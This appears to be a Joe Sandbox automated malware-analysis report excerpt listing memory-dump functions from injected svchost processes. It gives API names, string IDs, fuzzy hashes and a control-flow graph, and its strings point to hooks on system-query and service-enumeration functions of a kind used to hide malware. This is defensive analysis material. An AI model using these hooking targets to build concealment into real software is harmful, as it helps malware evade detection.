                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: _invalid_parameter_noinfo
                                                        • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                        • API String ID: 3215553584-4202648911
                                                        • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction ID: 99ebee8ea45fe0a9786a9c4ed11dd03fcaa3952423eabe6646d82df20e5116f7
                                                        • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                        • Instruction Fuzzy Hash: 7061C23668C30042FA658BE5E5C3BFE6EA0E78178EF544515DA0F937A4DBB7C841C288
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallEncodePointerTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3544855599-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 7acbc2e4e8793f3fe0f44b886d3766375e5a85e830d565591bd1b1d9b19824ab
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: A5618936608B849AFB109FA5D481BED7BA2F344B8DF045205EE4F57B98DB3AC095C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: fd0772b57a10f5ee3d03dfca06ca8f8fdafda8dc318c2fb514941a215750b28d
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 7151D236188380CAFB648BD59081BBC77A0F355B8AF046116DA5FC7B95CBBBC450C798
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                        • String ID: csm$csm
                                                        • API String ID: 3896166516-3733052814
                                                        • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction ID: 0c549113169c63b82f4eb0439e5f8d0fded427d2edf7ff314c8146e84b243ff3
                                                        • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                        • Instruction Fuzzy Hash: 02518E721483809BFB748BE190C5BA97BA2E354B8AF146115DA5FC7AD5CB3BD450C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction ID: 7dda59274c03c3fa635dd33b5e12994a731da3bfc9d46b6666e8b71b45b3c75c
                                                        • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                        • Instruction Fuzzy Hash: 73519132649B008AFB54CBD6E485FA83795F354B9DF508124DE1B83B58EBB7E840C788
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentImageNonwritable__except_validate_context_record
                                                        • String ID: csm$f
                                                        • API String ID: 3242871069-629598281
                                                        • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction ID: d574a5838cee0a89f3f3a63565909bfd7782941e71e265548c8e5aea6bd2b172
                                                        • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                        • Instruction Fuzzy Hash: 6F318D31249B409AF714DF92E886BA937A4F340B8EF058014EE5F83B94DB7BD940C788
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                        • String ID:
                                                        • API String ID: 2718003287-0
                                                        • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction ID: f20432c764ec1e0b106a42a51970bf11a474d24c72dd99a7e8f550ff0ed66ca1
                                                        • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                        • Instruction Fuzzy Hash: E4D1BC72758B808DF712CBE9D481AEC3BB5E354799F004216EE5E97B99DB36C506C380
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Free
                                                        • String ID:
                                                        • API String ID: 3168794593-0
                                                        • Opcode ID: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction ID: 0478c1a3af261ca2c2e0ef0fcd73c2b7d176ce7ca8816933a5e730a685654da8
                                                        • Opcode Fuzzy Hash: 637b04ff62da02b8b8c355a0b12521a64aeb4c7988103f0530a9550870a0a79b
                                                        • Instruction Fuzzy Hash: 6A018036548B90DEE706DFE2E8855AA67A1F749F8AF045028DA4F83715DF36C050C780
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ConsoleErrorLastMode
                                                        • String ID:
                                                        • API String ID: 953036326-0
                                                        • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction ID: 66dc8eb791194b220bed5d3989a0fe2ba9d1d817296486305e4d0376b7eb8cdb
                                                        • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                        • Instruction Fuzzy Hash: D791A132648B5089F7629FE584C2BFD2BA8A704B8EF145109EE0F97695DB37C446C780
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                        • String ID:
                                                        • API String ID: 2933794660-0
                                                        • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction ID: 26315b277f0833fa29e6206e1a37c947975b73cd93ff35a93702093b29e9861a
                                                        • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                        • Instruction Fuzzy Hash: 24114C32755B0089FB01CBE0E8967A933B4F71976DF441E21DA6E827A4DB7AC198C380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction ID: 0f062c2000fda37f594db2641492732ab4a3e092627b12192f5d619f654c7c9e
                                                        • Opcode Fuzzy Hash: 54f1dfa0457f4d2b58266312e3bc9b9bd619b52cd53b64f893b189ad2eed13fb
                                                        • Instruction Fuzzy Hash: 6771D3362487C195F6349FE59882BF96B9AF389B8AF440025DD0F87B99DB37C945C380
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CallTranslator
                                                        • String ID: MOC$RCC
                                                        • API String ID: 3163161869-2084237596
                                                        • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction ID: 8a50fd077b55d767147a8b684bd0014825f6ee4c9455cdaf633ba578169a54a8
                                                        • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                        • Instruction Fuzzy Hash: 4F616832608B448AFB208FA5D0817ED77A0F344B8DF044216EE6E57B99DBBAD055C784
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: FileType
                                                        • String ID: \\.\pipe\
                                                        • API String ID: 3081899298-91387939
                                                        • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction ID: a2bfb7fda913f1e1fe19f6c7b4fcb7ee1ffa8c84edc466839910cc72a59897c2
                                                        • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                        • Instruction Fuzzy Hash: 3C51073224C7C2A1F6258BE9A1E5BFA6656F38574AF440015CE4F83B5ADB3BD505C7C0
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ErrorFileLastWrite
                                                        • String ID: U
                                                        • API String ID: 442123175-4171548499
                                                        • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction ID: cd8d986b631c472f2e62d269227b9dd1cdefb2696399252b170650b3eb51d930
                                                        • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                        • Instruction Fuzzy Hash: BE41D632319B4085EB21CFA5E4857E977A5F788799F404021EE4EC7794DB3EC401C780
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFileHeaderRaise
                                                        • String ID: csm
                                                        • API String ID: 2573137834-1018135373
                                                        • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction ID: eebf817035f43bb8bd238e610929092bc7213130e6fb6148e294eab5ce3c98b4
                                                        • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                        • Instruction Fuzzy Hash: 78113032258B4082FB618F55F4407A977E5F788B99F584220DE8E47759DF3EC551CB40
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: ierarchy Descriptor'$riptor at (
                                                        • API String ID: 592178966-758928094
                                                        • Opcode ID: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction ID: 8889b0c47ec14da33e3277f015dfdf4e0413e94902c43d1922f8fea6f1334091
                                                        • Opcode Fuzzy Hash: 13d46e236c22f038e3183f277bc937bc0c01c293d14bd07e4c5c2ea041926035
                                                        • Instruction Fuzzy Hash: 1BE08671684B4890EF018FA2E8816E833A0DB68B68F489122D95D46321FB39D1F9C341
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797368279.000001CBD8BA0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BA0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8ba0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: __std_exception_copy
                                                        • String ID: Locator'$riptor at (
                                                        • API String ID: 592178966-4215709766
                                                        • Opcode ID: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction ID: 377f2ecfa8fe3b999a50dcb3cab1f77f510c3be82b2217139a6f9118ea1a173d
                                                        • Opcode Fuzzy Hash: af0f0512ca75cd806a30771dd11e2a0f17b9e6725b3a9df23089972a8cb9d3f7
                                                        • Instruction Fuzzy Hash: 57E08671644F4880EF028FA1D4815E87360E768B58F889122C94D46321EB39D1E5C341
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000044.00000002.2797545530.000001CBD8BD0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001CBD8BD0000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_68_2_1cbd8bd0000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocFree
                                                        • String ID:
                                                        • API String ID: 756756679-0
                                                        • Opcode ID: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction ID: 912d26b72c26ad93e34c569596d669a6ded88d197370947b8223babb3ee4b667
                                                        • Opcode Fuzzy Hash: e6b128499454e36a5cfdb4ce6de946333e896a2fc86765bea62df52d9c8f7d1a
                                                        • Instruction Fuzzy Hash: 9511B235605B4495FA05CBE6A485ABAB3A1F789FCAF085028CE4F87765DF3BC446C380

                                                        Execution Graph

                                                        Execution Coverage:0.7%
                                                        Dynamic/Decrypted Code Coverage:0%
                                                        Signature Coverage:0%
                                                        Total number of Nodes:66
                                                        Total number of Limit Nodes:2

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                        • String ID:
                                                        • API String ID: 1683269324-0
                                                        • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction ID: b8f2d5d8970c08e30104490078ba1f72add17956867f785404ba5962f5222235
                                                        • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                        • Instruction Fuzzy Hash: 02118078A30A4382FB609B61F8393F923E4B754B45FD88238ED06815B1EF79C044C203

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 000001F2BD161628: GetProcessHeap.KERNEL32 ref: 000001F2BD161633
                                                          • Part of subcall function 000001F2BD161628: HeapAlloc.KERNEL32 ref: 000001F2BD161642
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616B2
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1616DF
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1616F9
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161719
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161734
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161754
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16176F
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16178F
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617AA
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD1617CA
                                                        • Sleep.KERNEL32 ref: 000001F2BD161AD7
                                                        • SleepEx.KERNELBASE ref: 000001F2BD161ADD
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1617E5
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161805
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161820
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD161840
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD16185B
                                                          • Part of subcall function 000001F2BD161628: RegOpenKeyExW.ADVAPI32 ref: 000001F2BD16187B
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD161896
                                                          • Part of subcall function 000001F2BD161628: RegCloseKey.ADVAPI32 ref: 000001F2BD1618A0
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CloseOpen$HeapSleep$AllocProcess
                                                        • String ID:
                                                        • API String ID: 1534210851-0
                                                        • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction ID: dbf663d1485315679b68e8288550e8b7b0c6c51f1b1d89a94094fb3e67a57733
                                                        • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                        • Instruction Fuzzy Hash: 7731B97922464382EB509B26EA713F973B5AB85BC0F985835DE0A87695FF34C8D18312

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: dialer
                                                        • API String ID: 0-3528709123
                                                        • Opcode ID: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction ID: 3aac585823334c127dda7282b47a4669109186ccc3810c2214bda50ad0b13ecd
                                                        • Opcode Fuzzy Hash: 65427932a6511f3c8dca5889eed1792e2f2e2d3e0b30565664b7cb78ea33e46c
                                                        • Instruction Fuzzy Hash: 81D05EB43216078AFB549FE698E46F02354AB08744FCC4134CD0441160DB38898DE611

                                                        Control-flow Graph

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796321161.000001F2BD130000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD130000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd130000_svchost.jbxd
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID:
                                                        • API String ID: 1029625771-0
                                                        • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction ID: 5a31c6780180920593c79de93fd5a78e32e1db436847973b0c6c9579bd3f76a4
                                                        • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                        • Instruction Fuzzy Hash: CB61EF32B216A297EF54AF1590207FDB3A2FB54BA4F98C131DE5907788DA38D852C701

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                        • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                        • API String ID: 2119608203-3850299575
                                                        • Opcode ID: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction ID: 107207480c6beedcfac9e10622a0404f813cce9df297bff4ecca76f0d2a71204
                                                        • Opcode Fuzzy Hash: 9c3d18d3d08cd52b53439cd9635d78b514e0dbb1c6aaf52094b9259375ebc022
                                                        • Instruction Fuzzy Hash: 16B18D7A231A9386EB69CF25D4607F963A5FB44B94F845036EE4953B94EF35CC80C342
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                        • String ID:
                                                        • API String ID: 3140674995-0
                                                        • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction ID: 2191b91c7ae414d5341e28445c4bdcd7f9ae6a593b554c58698db7f92569058a
                                                        • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                        • Instruction Fuzzy Hash: AB314F76215B828AEBA49F60E8607FD7364F784748F84443ADE4D57B98EF38C548C711

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                        • String ID: d
                                                        • API String ID: 2005889112-2564639436
                                                        • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction ID: 630f6eb47bae6733bdbe7fb6a2d06b5e13df8154db8fa66121e5b802eb99e1ef
                                                        • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                        • Instruction Fuzzy Hash: C6515BB6220B8686EB54CF62E4683EA77A1F789B99F844134DE4907B29DF3CC445C701

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: CurrentThread$AddressHandleModuleProc
                                                        • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                        • API String ID: 4175298099-1975688563
                                                        • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction ID: 44394e3bb61418d90b21b3d16070fd92066106fc5670cf8bb63d378dec672435
                                                        • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                        • Instruction Fuzzy Hash: F5318CB9635A4BA0EB05EBAAE8716F42321B705394FC05073EC1D135B6AF78828DC352

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                        • String ID: csm$csm$csm
                                                        • API String ID: 849930591-393685449
                                                        • Opcode ID: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction ID: d5e0ca40e81d9d4a17391a4d0fb4706baa6880c7b00ec249b536ae7b7c49b8b2
                                                        • Opcode Fuzzy Hash: 186f03c70d0fb8979f980bfcf85fe288d7737d97a0f3839797273e271350e365
                                                        • Instruction Fuzzy Hash: BDE1F57A621B838AEB20DF65D4603FD77A4F744B98F900126EF8957B9ACB34D481C706

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 721 1f2bd16104c-1f2bd1610b9 RegQueryInfoKeyW 722 1f2bd1611b5-1f2bd1611d0 721->722 723 1f2bd1610bf-1f2bd1610c9 721->723 723->722 724 1f2bd1610cf-1f2bd16111f RegEnumValueW 723->724 725 1f2bd1611a5-1f2bd1611af 724->725 726 1f2bd161125-1f2bd16112a 724->726 725->722 725->724 726->725 727 1f2bd16112c-1f2bd161135 726->727 728 1f2bd161147-1f2bd16114c 727->728 729 1f2bd161137 727->729 731 1f2bd161199-1f2bd1611a3 728->731 732 1f2bd16114e-1f2bd161193 GetProcessHeap HeapAlloc GetProcessHeap HeapFree 728->732 730 1f2bd16113b-1f2bd16113f 729->730 730->725 733 1f2bd161141-1f2bd161145 730->733 731->725 732->731 733->728 733->730
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000045.00000002.2796452733.000001F2BD160000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F2BD160000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_69_2_1f2bd160000_svchost.jbxd
                                                        Similarity
                                                        • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                        • String ID: d
                                                        • API String ID: 3743429067-2564639436
